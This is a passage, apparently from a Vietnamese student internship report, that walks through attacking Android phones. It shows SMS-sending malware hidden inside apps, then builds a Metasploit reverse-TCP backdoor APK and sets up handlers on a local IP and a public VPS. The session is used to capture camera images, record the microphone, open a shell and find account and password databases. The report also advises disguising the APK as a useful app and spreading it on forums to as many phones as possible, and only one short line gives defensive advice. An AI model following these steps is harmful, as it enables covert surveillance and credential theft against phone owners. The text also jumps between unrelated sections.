signing, cài đặt sau đó mở ứng dụng tại Android01. Ta được kết quả.
Tại đây ta ấn chọn 7 lần trong giao diện của iCalendar mã độc sẽ được kích
hoạt và gửi tin nhắn đến máy Android02.
4.2. iMatch
Tương tự như iCalendar, iMatch cho phép gửi tinh nhắn trái phép khi mã độc bị
kích hoạt. Điểm khác nhau ở đây là iMatch là một ứng dụng game và mã độc có thể
gửi bốn tin nhắn cho 4 số điện thoại giống hoặc khác nhau.
Thực hiện tương tự như với iCalendar.apk nhưng thay thế bằng file
iMatch.apk. Tại bước View Smali Code ta vào tiếp theo đường dẫn .\com\mj\utils
ta được
Ta thấy khi ứng dụng iMatch tai máy Android01 được khởi động thì có bốn
tin nhắn được gửi đến máy Android02 (vì ở đây thiết đặt bốn số điện thoại đến
giống nhau là máy Android02).
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho
lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ
dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository.
Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu
vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý
gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về
mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong
việc xem xét hoặc thay đổi mã nguồn của các công cụ.
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với
kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra.
Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy
Note.
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất,
chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng
không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật
thực hiện đánh giá mạng không dây.
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống.
Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops
như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
5.2.5. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai.
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì
hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố
thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali
đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người
dùng không phải cài lại mới hoàn toàn nữa
Chọn phiên bản phù hợp tiến hành download. Ở đây chọn phiên bản dành
cho windowns 32 bit download bằng link trực tiếp. Sau khi có file iso ta tiến hành
cài đặt Kali Linux trên máy ảo.
Khởi động VMwarre, ở góc phải trên màn hình chọn File => New Virtual
Machine....
Hình 5.2: Tìm đường dẫn đến file iso Kali Linux.
Chọn Installer disc image file, nhấn Browse… tìm đường dẫn đến file iso
của Kali Linux sau đó nhấn Next để tiếp tục.
Thiết đặt dung lượng tối đa dùng để cài đặt Kali Linux sau đó chọn Next.
Tại đây ta chọn Graphical install => Enter để tiến hành cài đặt trực quan
bằng giao diện.
Tiến hành chọn lựa ngôn ngữ (ở đây chọn English), nhấn continue.
Tiếp theo là thiết đặt mạng. Đặt tên Hostname là bắt buộc. Ta có thể đặt tên
bất kỳ nhưng không thể có khoảng trắng. Nhấn Continue để tiếp tục.
Điền hai lần Root password giống nhau (nhớ password đã đặt để sau này
đăng nhập) => Continue.
Tùy chọn ổ đĩa cài đặt. Ở đây ta chọn use entire disk -> continue.
Kiểm tra thiết đặt thông tin ổ đĩa. Nếu có sai sót chọn Go Back để sửa đổi.
Chọn Continue tiếp tục.
Chọn Yes để xác nhận thay đổi ổ đĩa => Continue để tiến trình bắt đầu copy
file và cài đặt Kali Linux.
Ở đây nếu chọn Yes tiến trình sẽ kiểm tra có hay không bản cập nhật qua
mạng. Ta chọn No để nhanh chóng cài đặt (có thể cập nhật sau khi cài đặt xong).
Tiếp theo tiến trình sẽ hỏi có cài đặt và sử dụng GRUB để khởi động không.
Ta chọn Yes => Continue.
Thông báo xác nhận Kali Linux Đã cài đặt xong. Ta chọn Continue tiến trình
sẽ thực hiện xoa một số file dư thừa sau khi cài đặt rồi khởi động lại.
Sau khi khởi động xong ta nhập User là root va password được đặt ở trên để
đăng nhập. Như vậy là ta đã hoàn thành cài đặt xong Kali Linux.
Trên phần Bridge (connect VMs directly to the external network) chọn
adapter của máy thật
Tiếp theo ta sẽ tiến hành xâm nhập và điều khiển Android bằng Kali Linux.
Đầu tiên ta cần tạo 1 file apk có chứa backdoor bằng cách:
Đầu tiên mở terminal và gõ dòng lệnh ifconfig để biêt thông tin ip của máy.
Sử dụng lệnh:
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một
Metasploit reverse tcp backdoor.
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về
bằng cách gõ lệnh sau:
use exploit/multi/handler
set lhost 192.168.240.132 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set port 4444 – nhập port giống với port khi tạo payload ở trên.
exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Đến đây, vấn đề của chúng ta là làm sao để phân tán file chứa backdoor
App.apk đến các máy Android. Ta có thể ngụy trang file App.apk thành một ứng
dụng, game va tiến hành chia sẻ trên forum. Ở đây thử với một máy Galaxy Nexus
One giả lập, tải về App.apk, cài đặt:
Khởi động ứng dụng vậy là ta đã kết nối thành công tới máy Android này, ở
msfconsole sẽ như sau:
Lệnh help: xuất ra danh sách toàn bộ các lệnh mà Kali Linux hỗ trợ.
File hình đã chụp từ camera của máy android là RbWBRryj.jpeg được lưu
ở /root của máy
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về
máy
Và file này sẽ được tải về thư mục root của máy Kali
Lệnh shell: điều khiển trong môi trường terminal của máy Android.
Nhập lệnh shell để điều khiển máy trong môi trường terminal. Tại đây ta nhập
lệnh ls –l để xem các file và quyền hạn cần để sử dụng.
Như các bạn cũng thấy thư muc data cần quyền hạn cao nhất để tiến hành sử
dụng. Mà các dữ liệu quan trọng như Contacts, SMS, tài khoản đồng bộ Google…
đều được lưu tại đây. Vì thế ta chỉ có thể lấy cắp các thông tin này nếu như máy
Android bị xâm nhập đã được root (hack chiếm quyền điều khiển cao nhất).
Trong một số trường hợp, người dùng máy Android sử dụng một số chương
trình Backup and Retore tiến hành lưu trữ lại các thông tin quan trọng đến bộ nhơ
máy. Ta có thể lấy được các file này một cách dễ dàng.
Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file
lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, tiến
hành bảo vệ máy với các chương trình Anti-virus, không tiến hành root may nếu
không thực sự cần thiết vì chỉ cần máy bị nhiễm backdoor là ta đã có thể xem như
có toàn quyền kiểm soát máy Android đó.
Nhập địa chỉ IP của VPS sau đó tiến hành đăng nhập.
Tiếp theo, trên VPS ta cần download bộ cài đặt Metasploit tại địa chỉ sau:
http://www.metasploit.com/.
Tại đây có hai phiên bản có thể lựa chọn: bản Pro có được dùng thử 14 ngày
sau đó phải trả phí để tiếp tục sử dụng và bản Community miễn phí với một số
tính năng bị hạn chế. Ở đây mình chọn sử dụng bản Community để nghiên cứu.
Tại đây điền đầy đủ thông tin trang web yêu cầu sau đó nhấn SUBMIT &
DOWNLOAD để tiến hành tải xuống.
Chọn I accept the agreement để xác nhận điều khoản sử dụng sau đó chọn
Next.
Xác định đường dẫn cài đặt Metasploit rồi chọn Next.
Chương trình nhắc nhở tắt các ứng dụng Anti-Virus và Firewall. Ta tiến hành
tắt các ứng dụng này đi sau đó chọn Next.
Chọn Server Name và Day of Validity rồi chọn Next hai lần để bắt đầu cài
đặt. Sau khi tiến trình chạy xong ta chọn Finish để kết thúc.
Như vậy ta đã cài đặt thành công Metasploit trên máy chủ ảo VPS.
Sau khi chạy xong ta được file vps.apk là file có chứa mã độc dùng để tấn
công Android. Ở đây việc cần làm là phát tán file này đến càng nhiều máy Android
càng tốt. Ta có thể thực hiện bằng cách ngụy trang thành các ứng dụng có ích và
chia sẻ trên các diễn đàn về điện thoại Android.
Tiếp theo tiến hành kết nối đến VPS và khởi động Metasploit Console tại
đường dẫn Start => Programs => Metasploit => Metasploit Console.
Use exploit/multi.hander
Set lhost 103.20.148.71 – với lhost là địa chỉ IP của VPS đã nhập ở trên.
Hình 6.15: thiết lập thông tin cho cổng lắng nghe.
Sau khi hoàn thành bước này, việc cần làm là chờ cho đến khi có máy một
Android nào đó có kết nối internet và cài đặt, khởi động file vps.apk ở trên. Khi
đó ta được như hình:
Như vậy ta đã thành công xâm nhập vào máy Android. Tại đây ta có thể tiến
hành điều khiển, đánh căp dữ liệu như đã trình bày trong phần sử dụng Kali Linux.
Mặc dù đã thành công xâm nhập vào Android nhưng một số trường hợp trong
quá trình khai thác dữ liệu sẽ báo lỗi do không đủ quyền hạn truy cập hệ thống.
Đây là cơ chế bảo mật của Android để bảo vệ những dữ liệu quan trọng. Trong
trường hợp này, việc khai thác dữ liệu sẽ gặp rất nhiều hạn chế hoặc thông thể thực
hiện với dữ liệu quan trọng.
Một trường hợp khác là sau khi xâm nhập thành công vào Android liền có
quyền hàn tối cao (system). Đây là do máy Android bị xâm nhập đã được người
sử dụng root (chiếm quyền điều khiển). Trường hợp này ta có thể tùy ý khai thác
máy Android.
Để kiểm tra máy Android đã root chưa ta vào điều khiển trong môi
trường shell và nhập lệnh :
su
whoami
Nếu báo unknown id is 0 tức là đã root
ls -l danh mục file và các quyền
cd để chuyển hướng thư mục
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
Để xem danh sách và download các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
Ctrl + C để quay lại
Sử dụng SQLite để mở file db
Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành
Android
Tìm hiểu về hệ điều hành Kali Linux
Tìm hiểu về các lỗ hổng bảo mật của Windows và Android
Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng
Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh
nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học
và cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là
quá trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần
để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao
tiếp và ứng xử.
[2] http://www.vietnamandroid.com/
[3] http://vi.wikipedia.org/wiki/Android
[4] http://forum.genk.vn/threads/147/
[5] http://phienbanmoi.com/threads/lich-su-ra-doi-he-dieu-hanh-android-tai-lieu-
huong-dan-lap-trinh.107/
[6] http://sohoa.vnexpress.net/tin-tuc/doi-song-so/thi-truong/ios-bam-duoi-quyet-
liet-android-ve-thi-phan-di-dong-2960981.html
[7] http://forum.bkav.com.vn/showthread.php/99182-hieu-chinh-xac-ve-cac-loai-
ma-doc
[8] http://www.nguoiduatin.vn/mat-39-ty-dongngay-vi-ma-doc-a137388.html